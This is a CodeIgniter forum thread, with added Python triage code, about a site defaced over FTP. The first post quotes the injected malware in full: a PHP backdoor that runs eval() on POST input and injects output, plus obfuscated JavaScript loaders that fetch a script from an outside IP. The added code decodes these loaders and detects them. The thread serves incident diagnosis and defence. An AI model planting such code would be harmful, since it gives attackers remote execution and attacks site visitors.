Codeigniter Site Hacked
#1

[eluser]Patient[/eluser]
Just had a CodeIgniter site hacked. It was accessed via FTP with a genuine FTP username. There are ~2700 FTP log entries within a 24-minute period. The FTP access went through the site directory retrieving pages and uploading many modified pages. The first few lines from the FTP log are (note xxxxxxxxxxxxxxxx = valid FTP user):

Code:
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PASS (hidden)" 230 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PWD" 257 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "TYPE A" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,158,251" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "LIST /" 226 1432
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,222,47" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:27 -0500] "LIST /IE7" 226 1104
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "PORT 81,169,145,25,231,203" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "LIST /IE7/assets/director" 226 213
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "PORT 81,169,145,25,160,5" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "LIST /IE7/assets/img" 226 284
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,160,25" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "LIST /IE7/assets/js" 226 1091
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,237,105" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:34 -0500] "RETR /IE7/assets/js/effects.js" 226 38227
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:35 -0500] "PORT 81,169,145,25,240,127" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "STOR /IE7/assets/js/effects.js" 226 38453
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "PORT 81,169,145,25,243,1" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "RETR /IE7/assets/js/general.js" 226 870
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "PORT 81,169,145,25,244,181" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "STOR /IE7/assets/js/general.js" 226 1096
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:38 -0500] "PORT 81,169,145,25,246,133" 200 -

The modifications made to pages were:

PHP - added the following at the top of the page:

Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Nzb0ZjT2pjcjhuZ2lwZ0t0JTIwc29GcmNnSyUzRCUyRiUyRjk0bUxTJTJFMm9GNG9GN29GJTJFMiUyRTE5NSUyRmpxOG5ndWVPamNyeSUyRW1BamdLcyUzRSUzQ29GJTJGbUFzZ0tjbUxTcm1BaW9GcDhuZ3QlM0UnKS5yZXBsYWNlKC9tQXxnS3xtTFN8T2pjfDh4bXw4bmd8b0YvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#[removed]#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#[removed]<!-- \ndocument\.write\(unescape\(.+?\n -->[removed]#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

JS - added the following to the bottom of the pages:

Code:
<!--
[removed](unescape('u8E<nUscAOCrDlsipt 29gsWvArc=29g//u8E94.Q9D247Dls.Q9D2WvA.AOC129g9Dls529g/nUjquWvAe29gr29gyAOC.jWvAs>PvM</scru8Ei29gpu8EtKF>').replace(/Q9D|KF|29g|nU|AOC|WvA|PvM|u8E|Dls/g,""));
-->

HTML - added the following immediately before the <body> tag:

Code:
[removed]<!--
[removed](unescape('<ZTsTmcbdariptta ZTsrc=ta/z0/M894.ta2bda4Qn47.2z0.195/ZTjquez0rTmy.jQn4sta></sM8cZTripM8t>').replace(/Tm|M8|si|ta|ZT|Qn4|z0|bda/g,""));
-->[removed]

As far as I can see these are obfuscated commands to import a js file jquery.js from ip 94.247.2.195.

Anyone seen this?

Any way to protect the site?
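An added example (Python; not code from the original post or from CodeIgniter) for the two things a responder does first with the material above: parse the FTP log format shown to pull out the RETR/STOR pairs that mark a download-patch-upload of the same file, and reverse the unescape('...').replace(/junk/g,"") trick that all three loaders use, including the base64 constant in the PHP payload, to recover the tag they write. The six log lines and the three loader strings are copied from the post; the forum's [removed] tokens stand where document.write was, which the decoder does not need. The 60-second pairing window is an assumption.

```python
"""Triage helpers for the FTP-based defacement described in this thread (added example)."""
import base64
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample: six of the log lines quoted in the post (user masked as there).
FTP_LOG = """\
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PASS (hidden)" 230 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "LIST /" 226 1432
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:34 -0500] "RETR /IE7/assets/js/effects.js" 226 38227
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "STOR /IE7/assets/js/effects.js" 226 38453
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "RETR /IE7/assets/js/general.js" 226 870
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "STOR /IE7/assets/js/general.js" 226 1096
"""

# <client ip> <ident> <ftp user> [<timestamp>] "<COMMAND> <argument>" <reply code> <bytes>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<cmd>[A-Z]+)(?: (?P<arg>[^"]*))?" (?P<code>\d{3}) (?P<size>\S+)$')


def parse_ftp_log(text):
    """One dict per parseable line; 'size' is None where the log shows '-'."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["size"] = int(e["size"]) if e["size"].isdigit() else None
        entries.append(e)
    return entries


def find_modified_files(entries, window_seconds=60):
    """Paths RETR'd and then STOR'd back by the same client/user within the window
    (assumed 60 s): the download-patch-upload signature of a mass defacement tool.
    Returns {path: (client ip, bytes added)}."""
    last_retr, modified = {}, {}
    for e in entries:
        key = (e["ip"], e["user"], e["arg"])
        if e["cmd"] == "RETR" and e["code"] == "226":
            last_retr[key] = e
        elif e["cmd"] == "STOR" and e["code"] == "226" and key in last_retr:
            r = last_retr[key]
            if (e["time"] - r["time"]).total_seconds() <= window_seconds:
                grew = (e["size"] or 0) - (r["size"] or 0)
                modified[e["arg"]] = (e["ip"], grew)
    return modified


# Every loader in the post has the shape  unescape('<junk-laced HTML>').replace(/junk/g,"")
STAGER_RE = re.compile(r"unescape\('([^']*)'\)\.replace\(/([^/]*)/g,\s*\"\"\)")


def decode_stager(js):
    """Return the HTML the loader would write, or None if the pattern is absent.
    urllib's unquote handles the %XX escapes used here (JS unescape also knows %uXXXX)."""
    m = STAGER_RE.search(js)
    if not m:
        return None
    payload, junk = m.groups()
    return re.sub(junk, "", unquote(payload))


def script_src(html):
    """src attribute of the first <script> tag in html, or None."""
    m = re.search(r'<script[^>]*\ssrc=["\']?([^\s"\'>]+)', html, re.I)
    return m.group(1) if m else None


def decode_php_constant(b64):
    """TMP_XHGFJOKL in the PHP payload is base64 of a <script> block holding a stager."""
    return decode_stager(base64.b64decode(b64).decode("latin-1"))


# Loaders as quoted in the post; the forum replaced document.write with [removed].
JS_LOADER = """[removed](unescape('u8E<nUscAOCrDlsipt 29gsWvArc=29g//u8E94.Q9D247Dls.Q9D2WvA.AOC129g9Dls529g/nUjquWvAe29gr29gyAOC.jWvAs>PvM</scru8Ei29gpu8EtKF>').replace(/Q9D|KF|29g|nU|AOC|WvA|PvM|u8E|Dls/g,""));"""
HTML_LOADER = """[removed](unescape('<ZTsTmcbdariptta ZTsrc=ta/z0/M894.ta2bda4Qn47.2z0.195/ZTjquez0rTmy.jQn4sta></sM8cZTripM8t>').replace(/Tm|M8|si|ta|ZT|Qn4|z0|bda/g,""));"""
PHP_B64 = "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Nzb0ZjT2pjcjhuZ2lwZ0t0JTIwc29GcmNnSyUzRCUyRiUyRjk0bUxTJTJFMm9GNG9GN29GJTJFMiUyRTE5NSUyRmpxOG5ndWVPamNyeSUyRW1BamdLcyUzRSUzQ29GJTJGbUFzZ0tjbUxTcm1BaW9GcDhuZ3QlM0UnKS5yZXBsYWNlKC9tQXxnS3xtTFN8T2pjfDh4bXw4bmd8b0YvZywiIikpOwogLS0+PC9zY3JpcHQ+"

if __name__ == "__main__":
    for path, (ip, grew) in find_modified_files(parse_ftp_log(FTP_LOG)).items():
        print(f"{path}: rewritten from {ip}, +{grew} bytes")
    for name, html in (("js", decode_stager(JS_LOADER)), ("html", decode_stager(HTML_LOADER)),
                       ("php", decode_php_constant(PHP_B64))):
        print(f"{name} loader -> {html}  (src {script_src(html)})")
```

On the six quoted lines both JavaScript files come back 226 bytes larger than they were fetched, which is what appending one loader would do, and all three loaders decode to the same `<script src=//94.247.2.195/jquery.js></script>`, so the poster's reading of the payload holds. Run `find_modified_files` over the full ~2700-line log to get the complete list of rewritten paths before touching the backup.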
#2

[eluser]Dam1an[/eluser]
If the site was hacked via ftp with a valid username and password, it isn't the fault of CI
#3

[eluser]Zeeshan Rasool[/eluser]
I hacked my own CI site with SQL injection. I got the solution because it was my own leakage of code. So, I'm not sure, but it's not CI's fault.
#4

[eluser]Patient[/eluser]
[quote author="zEsHaN" date="1241009163"]I hacked my own CI site with SQL injection. I got the solution because it was my own leakage of code. So, I'm not sure, but it's not CI's fault.[/quote]

No need to defend CI - I'm not attacking it.

What "holes" in my code do I need to close to prevent this happening again?
#5

[eluser]Dam1an[/eluser]
It's not so much about fixing 'holes' in your code, as if they have FTP access, they can change it to their heart's content.

Assuming they have access to the full server via FTP (not just the web root) you could try setting all the file permissions to read only (using a non-FTP account, obviously).
#6

[eluser]Patient[/eluser]
[quote author="Dam1an" date="1241010062"]It's not so much about fixing 'holes' in your code, as if they have FTP access, they can change it to their heart's content.

Assuming they have access to the full server via FTP (not just the web root) you could try setting all the file permissions to read only (using a non-FTP account, obviously).[/quote]

The question is how did they gain ftp access?
#7

[eluser]wwwald[/eluser]
That's up to you to find out. In any case, the FTP credentials for your hosting account are not related to CI in any way, but I think we are clear on that by now.

I'd contact your hosting firm first, to check if they have noticed any irregularities. What FTP server software are they using, in what version? Any known vulnerabilities there?
#8

[eluser]Dam1an[/eluser]
Also, if your FTP username is something obvious (any dictionary word for that matter), how secure is your password? Uppercase, lowercase, numbers, symbols?
#9

[eluser]johnwbaxter[/eluser]
It was probably a dictionary attack on FTP users on your server. You need to change all active ftp usernames and passwords to something complex as a first thing, then restore the site they messed with from backup if possible.

Also if there were any passwords or usernames for DB access in your CI site, you need to change those too.
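An added example (Python; not code from the original post or from CodeIgniter) for the find-what-they-touched part of the restore: it walks a web root for the exact PHP prefix and JavaScript loader quoted in post #1 plus two generic indicators, and can strip the two known injections from files that have no backup copy. The sample web root is constructed here; its PHP prefix is a shortened stand-in for the full payload, and where the forum shows [removed] the loaders are written with document.write and <script> tags, which is the form the base64 constant in the PHP payload decodes to.

```python
"""Find and strip the injections quoted in this thread across a web root (added example)."""
import os
import re
import tempfile

# Indicators lifted from the code quoted in post #1. Where the forum shows
# [removed], the real files contain document.write(...) and <script> tags:
# the base64 constant TMP_XHGFJOKL in the PHP payload decodes to exactly that.
PHP_BACKDOOR = re.compile(r"<\?php if\(!function_exists\('tmp_lkojfghx'\)\).*?\?>", re.S)
JS_LOADER = re.compile(
    r"(?:<script[^>]*>)?<!--\s*document\.write\(unescape\('[^']*'\)"
    r"\.replace\(/[^/]*/g,\s*\"\"\)\);\s*-->(?:</script>)?", re.S)
GENERIC = [  # weaker catch-alls; anything they flag deserves a manual look
    ("eval-of-request", re.compile(r"eval\(\$_(?:POST|GET|REQUEST|COOKIE)\[")),
    ("long-base64", re.compile(r"base64_decode\('[A-Za-z0-9+/=]{40,}'\)")),
]


def scan_text(data):
    """Names of the indicators present in one file's contents."""
    hits = []
    if PHP_BACKDOOR.search(data):
        hits.append("php-backdoor")
    if JS_LOADER.search(data):
        hits.append("js-loader")
    hits += [name for name, rx in GENERIC if rx.search(data)]
    return hits


def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """{relative path: indicator names} for every flagged file under root."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def clean_text(data):
    """Strip only the two known injections. For files with no backup; the
    eval($_POST[...]) hook let the attacker run anything, so restoring from
    backup and rotating credentials is the real fix."""
    return JS_LOADER.sub("", PHP_BACKDOOR.sub("", data))


# --- constructed sample web root -------------------------------------------
# PHP_PREFIX is a shortened stand-in for the payload in the post; the two
# loaders are copied from the post with document.write restored.
PHP_PREFIX = ("<?php if(!function_exists('tmp_lkojfghx')){"
              "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);} ?>")
JS_BOTTOM = ("<!--\ndocument.write(unescape('u8E<nUscAOCrDlsipt 29gsWvArc=29g//u8E94.Q9D247Dls.Q9D2WvA.AOC129g9Dls529g/nUjquWvAe29gr29gyAOC.jWvAs>PvM</scru8Ei29gpu8EtKF>')"
             ".replace(/Q9D|KF|29g|nU|AOC|WvA|PvM|u8E|Dls/g,\"\"));\n-->")
HTML_BEFORE_BODY = ("<script language=javascript><!-- \ndocument.write(unescape('<ZTsTmcbdariptta ZTsrc=ta/z0/M894.ta2bda4Qn47.2z0.195/ZTjquez0rTmy.jQn4sta></sM8cZTripM8t>')"
                    ".replace(/Tm|M8|si|ta|ZT|Qn4|z0|bda/g,\"\"));\n --></script>")
ORIGINALS = {
    "application/controllers/welcome.php": "<?php\nclass Welcome extends Controller {}\n",
    "assets/js/general.js": "function init(){return 1;}\n",
    "index.html": "<html><head><title>t</title></head>\n<body></body></html>",
    "assets/js/clean.js": "function f(){return 2;}\n",
}
INFECTED = {
    "application/controllers/welcome.php": PHP_PREFIX + ORIGINALS["application/controllers/welcome.php"],
    "assets/js/general.js": ORIGINALS["assets/js/general.js"] + JS_BOTTOM,
    "index.html": ORIGINALS["index.html"].replace("\n<body>", HTML_BEFORE_BODY + "\n<body>"),
    "assets/js/clean.js": ORIGINALS["assets/js/clean.js"],
}


def build_sample_root():
    """Write the constructed (infected) tree into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, data in INFECTED.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(data)
    return root


def demo():
    """Scan the sample tree; also check that clean_text restores every original."""
    report = scan_tree(build_sample_root())
    restored = all(clean_text(INFECTED[rel]) == ORIGINALS[rel] for rel in ORIGINALS)
    return report, restored


if __name__ == "__main__":
    rep, ok = demo()
    for rel, hits in sorted(rep.items()):
        print(f"{rel}: {', '.join(hits)}")
    print("clean_text restores originals:", ok)
```

Point `scan_tree` at the real document root and diff its output against the rewritten paths from the FTP log; a file the log says was STOR'd but the scanner does not flag is the interesting case, because it means the attacker put something there other than these two injections. Use `clean_text` only where no backup from before the 10 April session exists.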
#10

[eluser]Patient[/eluser]
[quote author="audiopleb" date="1241013149"]It was probably a dictionary attack on FTP users on your server. You need to change all active ftp usernames and passwords to something complex as a first thing, then restore the site they messed with from backup if possible.

Also if there were any passwords or usernames for DB access in your CI site, you need to change those too.[/quote]

Thanks audiopleb.

Changing things now (may sound a bit dim but I missed the fact that in retrieving the config/database files they got password access to my database!!).